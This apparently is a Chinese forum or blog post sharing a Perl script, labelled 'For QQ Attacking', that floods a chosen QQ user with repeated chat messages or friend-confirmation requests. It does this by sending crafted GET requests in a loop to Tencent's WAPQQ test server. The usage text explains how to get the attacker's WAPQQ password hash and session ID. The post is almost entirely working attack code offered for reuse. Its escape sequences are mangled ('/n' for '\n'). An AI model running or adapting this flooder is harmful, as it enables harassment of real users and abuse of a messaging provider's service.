以前在尝试攻击的时候改写的程序,现在贴出来可能会对一些朋友有些用处。
内容很简单,将外部参数引入,然后按照要求开启Socket会话,本例中访问的是HTTP。
#!/usr/bin/perl
#Coded By Roy<Roy at c4st.cn>
#Script For QQ Attacking
$|=1;
use Socket;
use Getopt::Std;
#获取外部参数
getopt('aytgkl');
print "/n ===================================================/n";
print " Perl Script For QQ Attacking/n";
print " Coded By Roy<Roy at c4st.cn> /n";
print " Visit:luoyi.com & c4st.cn /n";
print " ===================================================/n";
#参数不符合要求则显示使用方法
&usage unless ( defined($opt_a) && defined($opt_y) && defined($opt_t) && defined($opt_g) && defined($opt_k));
#将外部参数赋给内部变量
$mode=$opt_a;
$time=$opt_l||1;
$urqq=$opt_y;
$targ=$opt_t;
$pg=$opt_g;
$pk=$opt_k;
#定义了攻击中使用到的服务器,waptest.tencent.com是WAPQQ免费体验用的服务器
$host="waptest.tencent.com";
$port=80;
#采用"验证请求"方式攻击
if ($mode eq "c"){
print"Attacking ...";
for ($i=1;$i<=$time;$i++){
&attack2;
}
print"/nDone!.";
}
#采用"普通消息"方式攻击
elsif ($mode eq "n"){
print"Attacking ...";
for ($i=1;$i<=$time;$i++){
&attack1;
}
print"/nDone!.";
}
else
{&usage};
#"普通消息"方式攻击函数,被攻击者将收到类似"10001 Is Coming"的信息,如果要修改信息内容,请修改Psendmsg变量
sub attack1 {
$req = "GET /cgi-bin/wapqq_chat.cgi?Pc=11&Pq=$urqq&Pg=$pg&Poq=$targ&Pk=$pk&Psendmsg=$urqq%20Is%20Coming&PMisc_mid=123456789&stn=gmcc_try HTTP/1.1/n".
"Accept: text/vnd.wap.wml, application/vnd.wap.wmlc, image/vnd.wap.wbmp, image/gif, image/jpeg, text/vnd.wap.wmlscript, application/vnd.wap.wmlscriptc/n".
"User-Agent: C4ST(^-^)/n".
"Host: waptest.tencent.com/n".
"/n/n";
print "/n";
sendraw($req);
}
#"验证请求"方式攻击函数,被攻击者将收到类似"10001 Is Coming"的信息,如果要修改信息内容,请修改PConfirmInfo变量
sub attack2 {
$req = "GET /cgi-bin/wapqq_chat.cgi?Pc=27&Pq=$urqq&Pg=$pg&Poq=$targ&Pk=$pk&PConfirmInfo=$urqq%20Is%20Coming&PMisc_mid=123456789&stn=gmcc_try HTTP/1.1/n".
"Accept: text/vnd.wap.wml, application/vnd.wap.wmlc, image/vnd.wap.wbmp, image/gif, image/jpeg, text/vnd.wap.wmlscript, application/vnd.wap.wmlscriptc/n".
"User-Agent: C4ST(^-^)/n".
"Host: waptest.tencent.com/n".
"/n/n";
print "/n";
sendraw($req);
}
#显示使用方法的函数,PG和PK的值可以在登陆WAPQQ后查看源代码而得到
sub usage {
print qq~
Usage: $0 -a <Attack Mode> -l <Loops Of Attacking> -y <Your QQ Number> -t <Target To Attack> -pg <PG For Your WAPQQ> -pk <PK For Your Session>
-a =Attack Mode,Choose "n" For Normal QQ Msg Type,Or Choose "c" For Confirm QQ Msg Type
-l =Loops Of Attacking,The Times To Attack The Target
-y =Your QQ Number
-t =Target To Attack,QQ Number
-g =PG For Your WAPQQ(1)
-k =PK For Your Session(1)
(1)HowTo Get PG And PK:
PG is your QQ password's hash used in WAPQQ site.PK is the session id for your current visiting at WAPQQ site.You can get them once you logged on WAPQQ via your mobile,wap browser(eg.WinWAP) or wap2web service(eg.http://www.easywap.ch/Wap2Web.html).
~;
exit;
}
#Socket函数
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems/n");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems/n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
close(S);
return true;
}
else {
die("Can't connect.../n");
}
}